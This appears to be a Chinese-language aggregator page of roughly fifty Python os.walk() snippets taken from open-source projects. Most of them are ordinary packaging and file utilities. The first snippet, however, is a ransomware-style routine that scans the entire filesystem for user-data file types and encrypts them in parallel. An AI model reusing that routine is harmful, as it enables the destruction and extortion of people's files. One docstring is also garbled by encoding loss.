我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用os.walk()。
def select_files(): ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv", ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg", ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar", ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe", ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h", ".gif", ".txt", ".py", ".pyc", ".jar", ".sql", ".bundle", ".sqlite3", ".html", ".php", ".log", ".bak", ".deb"] files_to_enc = [] for root, dirs, files in os.walk("/"): for file in files: if file.endswith(tuple(ext)): files_to_enc.append(os.path.join(root, file)) # Parallelize execution of encryption function over four subprocesses pool = Pool(processes=4) pool.map(single_arg_encrypt_file, files_to_enc)
def zipdir(archivename, basedir): '''Zip directory, from J.F. Sebastian http://stackoverflow.com/''' assert os.path.isdir(basedir) with closing(ZipFile(archivename, "w", ZIP_DEFLATED)) as z: for root, dirs, files in os.walk(basedir): #NOTE: ignore empty directories for fn in files: if fn[-4:]!='.zip': absfn = os.path.join(root, fn) zfn = absfn[len(basedir)+len(os.sep):] #XXX: relative path z.write(absfn, zfn) # ================ Inventory input data and create data structure =================
def zip_dir(directory): """zip a directory tree into a BytesIO object""" result = io.BytesIO() dlen = len(directory) with ZipFile(result, "w") as zf: for root, dirs, files in os.walk(directory): for name in files: full = os.path.join(root, name) rel = root[dlen:] dest = os.path.join(rel, name) zf.write(full, dest) return result # # Simple progress bar #
def load_data(self): # work in the parent of the pages directory, because we # want the filenames to begin "pages/...". chdir(dirname(self.setup.pages_dir)) rel = relpath(self.setup.pages_dir) for root, dirs, files in walk(rel): for filename in files: start, ext = splitext(filename) if ext in self.setup.data_extensions: #yield root, dirs, filename loader = self.setup.data_loaders.get(ext) path = join(root,filename) if not loader: raise SetupError("Identified data file '%s' by type '%s' but no loader found" % (filename, ext)) data_key = join(root, start) loaded_dict = loader.loadf(path) self.data[data_key] = loaded_dict #self.setup.log.debug("data key [%s] ->" % (data_key, ), root, filename, ); pprint.pprint(loaded_dict, sys.stdout) #pprint.pprint(self.data, sys.stdout) #print("XXXXX data:", self.data)
def prepare_zip(): from pkg_resources import resource_filename as resource from config import config from json import dumps logger.info('creating/updating gimel.zip') with ZipFile('gimel.zip', 'w', ZIP_DEFLATED) as zipf: info = ZipInfo('config.json') info.external_attr = 0o664 << 16 zipf.writestr(info, dumps(config)) zipf.write(resource('gimel', 'config.py'), 'config.py') zipf.write(resource('gimel', 'gimel.py'), 'gimel.py') zipf.write(resource('gimel', 'logger.py'), 'logger.py') for root, dirs, files in os.walk(resource('gimel', 'vendor')): for file in files: real_file = os.path.join(root, file) relative_file = os.path.relpath(real_file, resource('gimel', '')) zipf.write(real_file, relative_file)
def zipdir(path, zipn): for root, dirs, files in os.walk(path): for file in files: zipn.write(os.path.join(root, file))
def gen_data_files(src_dir): """ generates a list of files contained in the given directory (and its subdirectories) in the format required by the ``package_data`` parameter of the ``setuptools.setup`` function. Parameters ---------- src_dir : str (relative) path to the directory structure containing the files to be included in the package distribution Returns ------- fpaths : list(str) a list of file paths """ fpaths = [] base = os.path.dirname(src_dir) for root, dir, files in os.walk(src_dir): if len(files) != 0: for f in files: fpaths.append(os.path.relpath(os.path.join(root, f), base)) return fpaths
def clearpyc(root, patterns='*',single_level=False, yield_folders=False): """ root: ??¼ patterns ??????? single_level: ???¼?? yield_folders: ??¼?? """ patterns = patterns.split(';') for path, subdirs, files in os.walk(root): if yield_folders: files.extend(subdirs) files.sort() for name in files: for pattern in patterns: if fnmatch.fnmatch(name, pattern.strip()):# ?pattern??? yield os.path.join(path, name) if single_level: break
def get_distribution_names(self): """ Return all the distribution names known to this locator. """ result = set() for root, dirs, files in os.walk(self.base_dir): for fn in files: if self.should_include(fn, root): fn = os.path.join(root, fn) url = urlunparse(('file', '', pathname2url(os.path.abspath(fn)), '', '', '')) info = self.convert_url_to_download_info(url, None) if info: result.add(info['name']) if not self.recursive: break return result
def test_pydist(): """Make sure pydist.json exists and validates against our schema.""" # XXX this test may need manual cleanup of older wheels import jsonschema def open_json(filename): return json.loads(open(filename, 'rb').read().decode('utf-8')) pymeta_schema = open_json(resource_filename('wheel.test', 'pydist-schema.json')) valid = 0 for dist in ("simple.dist", "complex-dist"): basedir = pkg_resources.resource_filename('wheel.test', dist) for (dirname, subdirs, filenames) in os.walk(basedir): for filename in filenames: if filename.endswith('.whl'): whl = ZipFile(os.path.join(dirname, filename)) for entry in whl.infolist(): if entry.filename.endswith('/metadata.json'): pymeta = json.loads(whl.read(entry).decode('utf-8')) jsonschema.validate(pymeta, pymeta_schema) valid += 1 assert valid > 0, "No metadata.json found"
def get_all_pages(self): # work in the parent of the pages directory, because we # want the filenames to begin "pages/...". chdir(dirname(self.setup.pages_dir)) rel = relpath(self.setup.pages_dir) for root, dirs, files in walk(rel): # self.config.pages_dir): # examples: # # root='pages' root='pages/categories' # dirs=['categories'] dirs=[] # files=['index.html'] files=['list.html'] # self.setup.log.debug("\nTEMPLATE ROOT: %s" % root) # self.setup.log.debug("TEMPLATE DIRS: %s" % dirs) # self.setup.log.debug("TEMPLATE FILENAMES: %s" % files) # #dir_context = global_context.new_child(data_tree[root]) for filename in files: start, ext = splitext(filename) if ext in self.setup.template_extensions: # if filename.endswith(".html"): # TODO: should this filter be required at all? yield Page(self.setup, filename, join(root, filename))
def unpack_directory(filename, extract_dir, progress_filter=default_filter): """"Unpack" a directory, using the same interface as for archives Raises ``UnrecognizedFormat`` if `filename` is not a directory """ if not os.path.isdir(filename): raise UnrecognizedFormat("%s is not a directory" % filename) paths = { filename: ('', extract_dir), } for base, dirs, files in os.walk(filename): src, dst = paths[base] for d in dirs: paths[os.path.join(base, d)] = src + d + '/', os.path.join(dst, d) for f in files: target = os.path.join(dst, f) target = progress_filter(src + f, target) if not target: # skip non-files continue ensure_directory(target) f = os.path.join(base, f) shutil.copyfile(f, target) shutil.copystat(f, target)
def find_problems(problem_path): """ Find all problems that exist under the given root. We consider any directory with a problem.json to be an intended problem directory. Args: problem_path: the problem directory Returns: A list of problem paths returned from get_problem. """ problem_paths = [] for root, _, files in os.walk(problem_path): if "problem.json" in files and "__staging" not in root: problem_paths.append(root) return problem_paths
def files_from_directory(directory, recurse=True, permissions=0o664): """ Returns a list of File objects for every file in a directory. Can recurse optionally. Args: directory: The directory to add files from recurse: Whether or not to recursively add files. Defaults to true permissions: The default permissions for the files. Defaults to 0o664. """ result = [] for root, dirnames, filenames in os.walk(directory): for filename in filenames: result.append(File(join(root, filename), permissions)) if not recurse: break return result
def get_unignored_file_paths(cls, ignore_list=None, white_list=None): config = cls.get_config() ignore_list = ignore_list or config[0] white_list = white_list or config[1] unignored_files = [] for root, dirs, files in os.walk("."): logger.debug("Root:%s, Dirs:%s", root, dirs) if cls._ignore_path(unix_style_path(root), ignore_list, white_list): dirs[:] = [] logger.debug("Ignoring directory : %s", root) continue for file_name in files: file_path = unix_style_path(os.path.join(root, file_name)) if cls._ignore_path(file_path, ignore_list, white_list): logger.debug("Ignoring file : %s", file_name) continue unignored_files.append(os.path.join(root, file_name)) return unignored_files
def __processDir(self): """ Looks for Makefiles in the given directory and all the sub-directories if recursive is set to true """ self.__log("Processing directory %s" % self.__tgt) # if recurse, then use walk otherwise do current directory only if self.__recurse: for (path, dirs, files) in os.walk(self.__tgt): for curr_file in files: # if the file is a Makefile added to process if curr_file == __PATTERN__: fname = os.path.join(path, curr_file) self.__make_files.append(fname) self.__log("Adding %s to list" % fname) else: # just care to find Makefiles in this directory files = os.listdir(self.__tgt) if __PATTERN__ in files: fname = os.path.join(self.__tgt, __PATTERN__) self.__log("Appending %s to the list" % fname) self.__make_files.append(fname)
def get_sqls(self): """This function extracts sqls from the java files with mybatis sqls. Returns: A list of :class:`SQL`. For example: [SQL('', u'select a.id, b.name from db.ac a join db.bc b on a.id=b.id or a.id=b.iid where a.cnt > 10')] """ sqls = [] for root, dirs, files in os.walk(self.dir): for file in files: if not file.endswith('.java'): continue with codecs.open(os.path.join(root, file), 'r', encoding=self.encoding) as f: sqls.extend(MybatisInlineSqlExtractor.get_selects_from_text(MybatisInlineSqlExtractor.remove_comment(f.read()))) return sqls
def refactor_dir(self, dir_name, write=False, doctests_only=False): """Descends down a directory and refactor every Python file found. Python files are assumed to have a .py extension. Files and subdirectories starting with '.' are skipped. """ py_ext = os.extsep + "py" for dirpath, dirnames, filenames in os.walk(dir_name): self.log_debug("Descending into %s", dirpath) dirnames.sort() filenames.sort() for name in filenames: if (not name.startswith(".") and os.path.splitext(name)[1] == py_ext): fullname = os.path.join(dirpath, name) self.refactor_file(fullname, write, doctests_only) # Modify dirnames in-place to remove subdirs with leading dots dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def remove_folder(self, folder): """Delete the named folder, which must be empty.""" path = os.path.join(self._path, '.' + folder) for entry in os.listdir(os.path.join(path, 'new')) + \ os.listdir(os.path.join(path, 'cur')): if len(entry) < 1 or entry[0] != '.': raise NotEmptyError('Folder contains message(s): %s' % folder) for entry in os.listdir(path): if entry != 'new' and entry != 'cur' and entry != 'tmp' and \ os.path.isdir(os.path.join(path, entry)): raise NotEmptyError("Folder contains subdirectory '%s': %s" % (folder, entry)) for root, dirs, files in os.walk(path, topdown=False): for entry in files: os.remove(os.path.join(root, entry)) for entry in dirs: os.rmdir(os.path.join(root, entry)) os.rmdir(path)
def find_media_files(media_path): unconverted = [] for dirname, directories, files in os.walk(media_path): for file in files: #skip hidden files if file.startswith('.'): continue if is_video(file) or is_subtitle(file): file = os.path.join(dirname, file) #Skip Sample files if re.search(".sample.",file,re.I): continue unconverted.append(file) sorted_unconvered = sorted(unconverted) return sorted_unconvered
def get_latest_data_subdir(pattern=None, take=-1): def get_date(f): return os.stat(os.path.join(BASE_DATA_DIR, f)).st_mtime try: dirs = next(os.walk(BASE_DATA_DIR))[1] except StopIteration: return None if pattern is not None: dirs = (d for d in dirs if pattern in d) dirs = list(sorted(dirs, key=get_date)) if len(dirs) == 0: return None return dirs[take]
def garbage_collection(): global garbage_count, garbage_list garbage_count = 0 garbage_list = '' for root, dirs, targets in os.walk(media_path): for target_name in targets: if target_name.endswith(garbage): garbage_count += 1 fullpath = os.path.normpath(os.path.join(str(root), str(target_name))) garbage_list = garbage_list + "\n" + (str(garbage_count) + ': ' + fullpath) os.remove(fullpath) if garbage_count == 0: print ("\nGarbage Collection: There was no garbage found!") elif garbage_count == 1: print ("\nGarbage Collection: The following file was deleted:") else: print ("\nGarbage Collection: The following " + str(garbage_count) + " files were deleted:") print garbage_list # Log various session statistics
def list_image(root, recursive, exts): i = 0 if recursive: cat = {} for path, dirs, files in os.walk(root, followlinks=True): dirs.sort() files.sort() for fname in files: fpath = os.path.join(path, fname) suffix = os.path.splitext(fname)[1].lower() if os.path.isfile(fpath) and (suffix in exts): if path not in cat: cat[path] = len(cat) yield (i, os.path.relpath(fpath, root), cat[path]) i += 1 for k, v in sorted(cat.items(), key=lambda x: x[1]): print(os.path.relpath(k, root), v) else: for fname in sorted(os.listdir(root)): fpath = os.path.join(root, fname) suffix = os.path.splitext(fname)[1].lower() if os.path.isfile(fpath) and (suffix in exts): yield (i, os.path.relpath(fpath, root), 0) i += 1
def reseed(self, netdb): """Compress netdb entries and set content""" zip_file = io.BytesIO() dat_files = [] for root, dirs, files in os.walk(netdb): for f in files: if f.endswith(".dat"): # TODO check modified time # may be not older than 10h dat_files.append(os.path.join(root, f)) if len(dat_files) == 0: raise PyseederException("Can't get enough netDb entries") elif len(dat_files) > 75: dat_files = random.sample(dat_files, 75) with ZipFile(zip_file, "w", compression=ZIP_DEFLATED) as zf: for f in dat_files: zf.write(f, arcname=os.path.split(f)[1]) self.FILE_TYPE = 0x00 self.CONTENT_TYPE = 0x03 self.CONTENT = zip_file.getvalue() self.CONTENT_LENGTH = len(self.CONTENT)
def QA_save_tdx_to_mongo(file_dir, client=QA_Setting.client): reader = TdxMinBarReader() __coll = client.quantaxis.stock_min_five for a, v, files in os.walk(file_dir): for file in files: if (str(file)[0:2] == 'sh' and int(str(file)[2]) == 6) or \ (str(file)[0:2] == 'sz' and int(str(file)[2]) == 0) or \ (str(file)[0:2] == 'sz' and int(str(file)[2]) == 3): QA_util_log_info('Now_saving ' + str(file) [2:8] + '\'s 5 min tick') fname = file_dir + '\\' + file df = reader.get_df(fname) df['code'] = str(file)[2:8] df['market'] = str(file)[0:2] df['datetime'] = [str(x) for x in list(df.index)] df['date'] = [str(x)[0:10] for x in list(df.index)] df['time_stamp'] = df['datetime'].apply( lambda x: QA_util_time_stamp(x)) df['date_stamp'] = df['date'].apply( lambda x: QA_util_date_stamp(x)) data_json = json.loads(df.to_json(orient='records')) __coll.insert_many(data_json)
def create_zipfile(self, filename): zip_file = zipfile.ZipFile(filename, "w") try: self.mkpath(self.target_dir) # just in case for root, dirs, files in os.walk(self.target_dir): if root == self.target_dir and not files: raise DistutilsOptionError( "no files found in upload directory '%s'" % self.target_dir) for name in files: full = os.path.join(root, name) relative = root[len(self.target_dir):].lstrip(os.path.sep) dest = os.path.join(relative, name) zip_file.write(full, dest) finally: zip_file.close()
def unpack_directory(filename, extract_dir, progress_filter=default_filter): """"Unpack" a directory, using the same interface as for archives Raises ``UnrecognizedFormat`` if `filename` is not a directory """ if not os.path.isdir(filename): raise UnrecognizedFormat("%s is not a directory" % (filename,)) paths = {filename:('',extract_dir)} for base, dirs, files in os.walk(filename): src,dst = paths[base] for d in dirs: paths[os.path.join(base,d)] = src+d+'/', os.path.join(dst,d) for f in files: name = src+f target = os.path.join(dst,f) target = progress_filter(src+f, target) if not target: continue # skip non-files ensure_directory(target) f = os.path.join(base,f) shutil.copyfile(f, target) shutil.copystat(f, target)
def ensure_init(path): ''' ensure directories leading up to path are importable, omitting parent directory, eg path='/hooks/helpers/foo'/: hooks/ hooks/helpers/__init__.py hooks/helpers/foo/__init__.py ''' for d, dirs, files in os.walk(os.path.join(*path.split('/')[:2])): _i = os.path.join(d, '__init__.py') if not os.path.exists(_i): logging.info('Adding missing __init__.py: %s' % _i) open(_i, 'wb').close()
def chownr(path, owner, group, follow_links=True, chowntopdir=False): """Recursively change user and group ownership of files and directories in given path. Doesn't chown path itself by default, only its children. :param str path: The string path to start changing ownership. :param str owner: The owner string to use when looking up the uid. :param str group: The group string to use when looking up the gid. :param bool follow_links: Also Chown links if True :param bool chowntopdir: Also chown path itself if True """ uid = pwd.getpwnam(owner).pw_uid gid = grp.getgrnam(group).gr_gid if follow_links: chown = os.chown else: chown = os.lchown if chowntopdir: broken_symlink = os.path.lexists(path) and not os.path.exists(path) if not broken_symlink: chown(path, uid, gid) for root, dirs, files in os.walk(path): for name in dirs + files: full = os.path.join(root, name) broken_symlink = os.path.lexists(full) and not os.path.exists(full) if not broken_symlink: chown(full, uid, gid)
def get_dir_size(start_path = '.'): total_size = 0 for dirpath, dirnames, filenames in os.walk(start_path): for f in filenames: fp = os.path.join(dirpath, f) total_size += os.path.getsize(fp) return total_size
def get_apk_file_in_path(path): apk_map = [] for parent, dir_names, filenames in os.walk(path): for f in filenames: if f.endswith(Res.pgk_suffix): apk_map.append(os.path.join(parent, f)) return apk_map
def list_images(dir): r = [] for root, dirs, files in os.walk(dir): for name in files: if "jpg" in name or "mp4" in name: r.append(os.path.join(root, name)) return r # Load game IDs file
def package_files(directory): """Recursively add subfolders and files.""" paths = [] for (path, directories, filenames) in os.walk(directory): for filename in filenames: paths.append(os.path.join('..', path, filename)) return paths
def maybe_load_scriptlets(cfg): if scriptlets is not None: return global scriptlets scriptlets = OrderedDict() scriptlet_dir = os.path.join(cfg['assets'], 'scriptlets') for root, dirs, files in os.walk(scriptlet_dir): for filename in files: contents = open(os.path.join(root, filename)).read() m = re.search('_(.*)\.py', filename) if m: filename = m.group(1) scriptlets[filename] = contents
def maybe_load_policies(cfg, policies_dict): # Update policies_dict with files found in /src/assets/policies policy_dir = os.path.join(cfg['assets'], 'policies') for root, dirs, files in os.walk(policy_dir): for filename in files: contents = open(os.path.join(root, filename)).read() policies_dict[filename] = contents return policies_dict
def __init__(self, cfg): static_dir = os.path.join(cfg['assets'], 'static') self.files = {} for root, dirs, files in os.walk(static_dir): for filename in files: if not filename.startswith('!'): fullpath = os.path.join(root, filename) self.files[filename] = File(fullpath)
def _get_project(self, name): result = {'urls': {}, 'digests': {}} for root, dirs, files in os.walk(self.base_dir): for fn in files: if self.should_include(fn, root): fn = os.path.join(root, fn) url = urlunparse(('file', '', pathname2url(os.path.abspath(fn)), '', '', '')) info = self.convert_url_to_download_info(url, name) if info: self._update_version_data(result, info) if not self.recursive: break return result
def _iglob(path_glob): rich_path_glob = RICH_GLOB.split(path_glob, 1) if len(rich_path_glob) > 1: assert len(rich_path_glob) == 3, rich_path_glob prefix, set, suffix = rich_path_glob for item in set.split(','): for path in _iglob(''.join((prefix, item, suffix))): yield path else: if '**' not in path_glob: for item in std_iglob(path_glob): yield item else: prefix, radical = path_glob.split('**', 1) if prefix == '': prefix = '.' if radical == '': radical = '*' else: # we support both radical = radical.lstrip('/') radical = radical.lstrip('\\') for path, dir, files in os.walk(prefix): path = os.path.normpath(path) for fn in _iglob(os.path.join(path, radical)): yield fn
def write_record(self, bdist_dir, distinfo_dir): from wheel.util import urlsafe_b64encode record_path = os.path.join(distinfo_dir, 'RECORD') record_relpath = os.path.relpath(record_path, bdist_dir) def walk(): for dir, dirs, files in os.walk(bdist_dir): dirs.sort() for f in sorted(files): yield os.path.join(dir, f) def skip(path): """Wheel hashes every possible file.""" return (path == record_relpath) with open_for_csv(record_path, 'w+') as record_file: writer = csv.writer(record_file) for path in walk(): relpath = os.path.relpath(path, bdist_dir) if skip(relpath): hash = '' size = '' else: with open(path, 'rb') as f: data = f.read() digest = hashlib.sha256(data).digest() hash = 'sha256=' + native(urlsafe_b64encode(digest)) size = len(data) record_path = os.path.relpath( path, bdist_dir).replace(os.path.sep, '/') writer.writerow((record_path, hash, size))
def test_no_scripts(): """Make sure entry point scripts are not generated.""" dist = "complex-dist" basedir = pkg_resources.resource_filename('wheel.test', dist) for (dirname, subdirs, filenames) in os.walk(basedir): for filename in filenames: if filename.endswith('.whl'): whl = ZipFile(os.path.join(dirname, filename)) for entry in whl.infolist(): assert not '.data/scripts/' in entry.filename
def get_ext_outputs(self): """Get a list of relative paths to C extensions in the output distro""" all_outputs = [] ext_outputs = [] paths = {self.bdist_dir: ''} for base, dirs, files in os.walk(self.bdist_dir): for filename in files: if os.path.splitext(filename)[1].lower() in NATIVE_EXTENSIONS: all_outputs.append(paths[base] + filename) for filename in dirs: paths[os.path.join(base, filename)] = (paths[base] + filename + '/') if self.distribution.has_ext_modules(): build_cmd = self.get_finalized_command('build_ext') for ext in build_cmd.extensions: if isinstance(ext, Library): continue fullname = build_cmd.get_ext_fullname(ext.name) filename = build_cmd.get_ext_filename(fullname) if not os.path.basename(filename).startswith('dl-'): if os.path.exists(os.path.join(self.bdist_dir, filename)): ext_outputs.append(filename) return all_outputs, ext_outputs
def walk_egg(egg_dir): """Walk an unpacked egg's contents, skipping the metadata directory""" walker = os.walk(egg_dir) base, dirs, files = next(walker) if 'EGG-INFO' in dirs: dirs.remove('EGG-INFO') yield base, dirs, files for bdf in walker: yield bdf
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True, mode='w'): """Create a zip file from all the files under 'base_dir'. The output zip file will be named 'base_dir' + ".zip". Uses either the "zipfile" Python module (if available) or the InfoZIP "zip" utility (if installed and found on the default search path). If neither tool is available, raises DistutilsExecError. Returns the name of the output zip file. """ import zipfile mkpath(os.path.dirname(zip_filename), dry_run=dry_run) log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir) def visit(z, dirname, names): for name in names: path = os.path.normpath(os.path.join(dirname, name)) if os.path.isfile(path): p = path[len(base_dir) + 1:] if not dry_run: z.write(path, p) log.debug("adding '%s'", p) compression = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED if not dry_run: z = zipfile.ZipFile(zip_filename, mode, compression=compression) for dirname, dirs, files in os.walk(base_dir): visit(z, dirname, files) z.close() else: for dirname, dirs, files in os.walk(base_dir): visit(None, dirname, files) return zip_filename
def add_output(self, path): if os.path.isdir(path): for base, dirs, files in os.walk(path): for filename in files: self.outputs.append(os.path.join(base, filename)) else: self.outputs.append(path)
def create_zipfile(self, filename): zip_file = zipfile.ZipFile(filename, "w") try: self.mkpath(self.target_dir) # just in case for root, dirs, files in os.walk(self.target_dir): if root == self.target_dir and not files: tmpl = "no files found in upload directory '%s'" raise DistutilsOptionError(tmpl % self.target_dir) for name in files: full = os.path.join(root, name) relative = root[len(self.target_dir):].lstrip(os.path.sep) dest = os.path.join(relative, name) zip_file.write(full, dest) finally: zip_file.close()
def _find_packages_iter(cls, where, exclude, include): """ All the packages found in 'where' that pass the 'include' filter, but not the 'exclude' filter. """ for root, dirs, files in os.walk(where, followlinks=True): # Copy dirs to iterate over it, then empty dirs. all_dirs = dirs[:] dirs[:] = [] for dir in all_dirs: full_path = os.path.join(root, dir) rel_path = os.path.relpath(full_path, where) package = rel_path.replace(os.path.sep, '.') # Skip directory trees that are not valid packages if ('.' in dir or not cls._looks_like_package(full_path)): continue # Should this package be included? if include(package) and not exclude(package): yield package # Keep searching subdirectories, as there may be more packages # down there, even if the parent was excluded. dirs.append(dir)